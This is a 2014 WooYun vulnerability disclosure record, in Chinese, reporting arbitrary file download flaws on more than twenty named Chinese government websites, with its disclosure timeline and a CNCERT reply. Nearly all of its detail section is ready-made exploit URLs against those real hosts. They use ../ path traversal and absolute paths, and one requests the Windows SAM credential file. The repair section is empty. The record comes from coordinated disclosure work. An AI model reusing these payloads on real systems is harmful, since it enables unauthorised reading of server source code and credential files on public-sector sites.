漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-062347
漏洞标题:大批gov.cn政府网站任意文件下载(此处列出20余个)
相关厂商:cncert国家互联网应急中心
漏洞作者: 风情万种
提交时间:2014-05-30 11:01
修复时间:2014-07-14 11:02
公开时间:2014-07-14 11:02
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-05-30: 细节已通知厂商并且等待厂商处理中
2014-06-04: 厂商已经确认,细节仅向厂商公开
2014-06-14: 细节向核心白帽子及相关领域专家公开
2014-06-24: 细节向普通白帽子公开
2014-07-04: 细节向实习白帽子公开
2014-07-14: 细节向公众公开
简要描述:
大批gov.cn政府网站任意文件下载(此处列出)
详细说明:
http://www.grny.gov.cn/grny/images/stories/download.php?filename=download.php
http://zzz.lgq.gov.cn/admin/infofiles/download.php?filepath=./download.php&filename=download.php
http://fwpt.hnjgdj.gov.cn/web/download.action?fileName=../../index.jsp
http://bdanews.bda.gov.cn/front/download.action?fileName=index.jsp
http://www.yhmohrss.gov.cn/lemis/netweb/detail/download.jsp?url=/netweb/detail/&filename=download.jsp
http://www.cqldbz.gov.cn/wssb/download.jsp?filename=../index.jsp
http://www.hbcy.gov.cn/application/bgxz/download.jsp?filename=F:/web_changyang/public_html/application/bgxz/index.jsp
http://www.eqsc.gov.cn/manage/content/docmanage/download.jsp?filePath=/manage/content/docmanage/download.jsp
http://www.hazk.lss.gov.cn/12333/web/secondLevelPage/download.jsp?filename=../../../index.jsp
http://jld.cq.gov.cn/bgxz/download.jsp?filename=../index.jsp
http://www.cdetdz.gov.cn/edp/edpweb/downLoad.jsp?diskURL=D:/bssoft/edp/WebRoot/edpweb/downLoad.jsp&fileName=index.jsp
http://www.symzj.gov.cn/symz/mzxxw/zlxz/download.jsp?filename=../../../index.jsp
http://fwzx.bjpg.gov.cn/xzfwzx/system/download.jsp?filename=../download.jsp
http://www.szwen.gov.cn/download.jsp?fileName=download.jsp
http://www.yhmohrss.gov.cn/lemis/netweb/detail/download.jsp?url=C:\windows\system32\&filename=cmd.exe
http://www.ahmasepa.gov.cn:8088/masWeb/jsp/include/download.jsp?filename=../index.jsp
http://www.js.lss.gov.cn/Auditing/download.jsp?filename=../index.jsp
http://www.jiaohe.gov.cn/main/download.jsp?fileName=../index.jsp
http://www.ccfwy.gov.cn/wjxz/download.jsp?filename=../index.jsp
http://sh.hljagri.gov.cn/download.jsp?filename=../index.jsp
http://www.qzlyj.gov.cn/download.jsp?filename=../../index.jsp
http://www.ccgp-qinghai.gov.cn/download.jsp?filename=C:\Windows\System32\config\SAM
http://www.nbzj.gov.cn/cms/1120/plus/download.php?open=edit&link=download.php
漏洞证明:
其中一个download.jsp
http://www.yhmohrss.gov.cn/lemis/netweb/detail/download.jsp?url=/netweb/detail/&filename=download.jsp
其它的信息我就不说了
修复方案:
.....
版权声明:转载请注明来源 风情万种@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-06-04 10:02
厂商回复:
感谢白帽子做的批量检测工作,未认定为通用,已经根据所述实例测试下发给对应的多个分中心,由分中心进行事件型漏洞通报处置。rank 打满。
最新状态:
暂无